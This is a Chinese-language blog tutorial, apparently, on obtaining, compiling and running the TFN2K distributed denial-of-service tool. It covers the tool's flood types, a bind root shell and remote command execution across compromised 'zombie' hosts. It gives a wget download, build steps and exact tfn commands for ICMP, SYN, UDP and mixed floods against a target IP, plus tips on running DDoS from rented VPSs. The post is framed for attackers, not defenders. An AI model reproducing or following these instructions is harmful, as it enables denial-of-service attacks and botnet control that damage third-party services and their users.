tfn2k工具使用介绍

主要介绍tfn2k(Linux),因为它最著名嘛!主要分为使用说明 然后在说安装所以有点长

(注意:有的人拿VPS来做DDOS·问题是有的人发现了会关闭你VPS的·除非你认识他或者你自己有服务器而不是VPS)

简介:
TFN被认为是当今功能最强性能最好的DoS攻击工具,几乎不可能被察觉。作者发布这个工具的出发点是什么呢?作者向你保证它不会伤害公司或个人。但是它会吓一吓那些不关心系统安全的人,因为现在精密的工具被不断改善,并且被私人持有,他们许多都是不可预测的。现在是每一个人都清醒的时候了,每一个人都应该意识到假如他不足够关心他的安全问题,最坏的情形就会发生。
因此这个程序被设计成大多数的操作系统可以编译,以表明现在的操作系统没有特别安全的,包括Windows,Solaris,Linux及其他各种unix. 
特点描述:
TFN使用了分布式客户服务器功能,加密技术及其它类的功能,它能被用于控制任意数量的远程机器,以产生随机匿名的拒绝服务攻击和远程访问。

此版本的新特点包括:
1。功能性增加:
为分布式执行控制的远程单路命令执行
对软弱路由器的混合攻击
对有IP栈弱点的系统发动Targa3攻击
对许多unix系统和WinNT的兼容性。
2。匿名秘密的客户服务器通讯使用:
假的源地址
高级加密
单路通讯协议
通过随机IP协议发送消息
诱骗包

编译:
在编译之前,先要编辑src/makefile文件修改选项符合你的操作系统。建议你看一下src/config.h然后修改一些重要的缺省值。
一旦你开始编译,你会被提示输入一个8--32位的服务器密码。如果你使用REQUIRE_PASS类型编译,在使用客户端时你必须输入这个密码。 
使用客户端:
客户端用于联系服务器端,可以改变服务器端的配置,衍生一个shell,控制攻击许多其它的机器。你可以tfn -f file从一个主机名文件读取主机名,也可以使用tfn -h hostname联系一个服务器端。

缺省的命令是通过杀死所有的子线程停止攻击。命令一般用-c .
请看下面的命令行描述。 选项-i需要给命令一个值,分析目标主机字符串,这个目标主机字符串缺省用分界符@。
当使用smurf flood时,只有第一个是被攻击主机,其余被用于直接广播。
ID 1 -反欺骗级:服务器产生的DoS攻击总是来源于虚假的源地址。通过这个命令,你可以控制IP地址的哪些部分是虚假的,哪些部分是真实的IP。
ID 2 -改变包尺寸:缺省的ICMP/8,smurf,udp攻击缺省使用最小包。你可以通过改变每个包的有效载荷的字节增加它的大小。
ID 3 - 绑定root shell:启动一个会话服务,然后你连接一个指定端口就可以得到一个root shell。
ID 4 - UDP flood 攻击:这个攻击是利用这样一个事实:每个udp包被送往一个关闭的端口,这样就会有一个ICMP不可到达的信息返回,增加了攻击的能力。
ID5 - SYN flood 攻击:这个攻击有规律的送虚假的连接请求。结果会是目标端口拒绝服务,添瞒TCP连接表,通过对不存在主机的TCP/RST响应增加攻击潜力。
ID 6 - ICMP响应(ping)攻击:这个攻击发送虚假地址的ping请求,目标主机会回送相同大小的响应包。
ID 7 - SMURF 攻击:用目标主机的地址发送ping请求以广播扩大,这样目标主机将得到回复一个多倍的回复。
ID 8 - MIX攻击:按照1:1:1的关系交替的发送udp,syn,icmp包,这样就可以对付路由器,其它包转发设备,NIDS,sniffers等。
ID 9 -TARGA3攻击
ID 10 - 远程命令执行:给予单路在服务器上执行大量远程命令的机会。更复杂的用法请看4.1节。
更多的选项请看命令行帮助。

使用TFN2K用于分布式任务
Using TFN for other distributed tasks
依照CERT的安全报告,新版本的DDOS工具包含一个最新流行的特点:软件的自我更新。
TFN也有这个功能,作者并没有显式的包含这个功能。在ID 10远程执行命令中给予用户在任意数量远程主机上以批处理的形式执行同样shell命令的能力。这同时也证明了一个问题:DDOS等类似的分布式网络工具不仅仅简单的用于拒绝服务,还可以做许多实际的事情。

终于废话完了我们来安装

1.下载: wget http://www.rrcctv.com/tfn2k.tgz
2.解压: tar zxvf tfn2k.tgz
3.修改文件

src/ip.h 这里要做一些修改,否则编译会有错误,发生重复定义。

/*struct in_addr
{
unsigned long int s_addr;
};*/
注意啊~~我可是将它放在"/* */"之间,也就是注释掉了

4.更改编译器:

因为tfn2k支持的是egcs-1.1.2-30编译器,所以如果不替换掉gcc,tfn2k是编译不过去的.
需要注意的是,更改之后,有可能会造成基于gcc3.2.2的软件编译不去,请谨慎而行.

(不过你都拿来DDOS了不会搞其他软件了,一般也没什么事情)

更改编译器方法很简单的直接yum install gcc egcs-1.1.2-30 一条命令 百度上的资料都是花里花俏的

5.编译tfn2k

cd tfn2k/src(第一条命令)

make(第二条命令)

make回车键完了首先会谈出一个声明,你必须接受,之后会提示输入8-32位密码,前边提到过,这是唯一的认证凭证,会被分发于td进程中,所以一定
要记牢噢~。(其实就是tfn2k这个工具使用密码)

编译通过后,会产生td及tfn,这就是大名鼎鼎的tfn2k啦~,td是守护进程,用来安装在代理中的,而tfn就是控制端.

6.攻击测试(终于到使用怎么去攻击了,基本上是安装好了)

./td  (这个命令td 运行,这样你就拥有一个代理了,它会对你唯命是从的)

在控制端上先新建一个肉鸡的文件。(也就是现在安装的Linux,没办法只有自己一台电脑)

格式是

文件第一行输入:192.168.111.1 (其实也就是肉鸡的iP有多少肉鸡写多少个)
文件第二行输入:192.168.111.2 (这里面的IP就是运行了td进程的主机的IP)
文件第三行输入:192.168.111.3 (其实就是创建一个ip.txt文件保存肉鸡的iP)

echo "127.0.0.1" > ip.txt (这个命令是把肉鸡的IP写进去,这里用的是本机做肉鸡,就写本地地址。)

简单的测试一下

先来ICMP攻击
./tfn -f hosts.txt -c 6 -i 192.168.111.88(十分钟,192.168.111.88就死机了)
重启,接着测试。。。

SYN/TCP攻击:
./tfn -f hosts.txt -c 5 -i 192.168.111.88 -p 80

UDP攻击:
./tfn -f hosts.txt -c 4 -i 192.168.111.88

ICMP/TCP/UDP轮流攻击:
./tfn -f hosts.txt -c 8 -i 192.168.111.88

攻击结束
如果我们想停止攻击:
./tfn -f host.txt -c 0

上一篇:Visual Studio 快捷键汇总


下一篇:["Visual Studio快捷键" ,"Vs","IDEA快捷键"]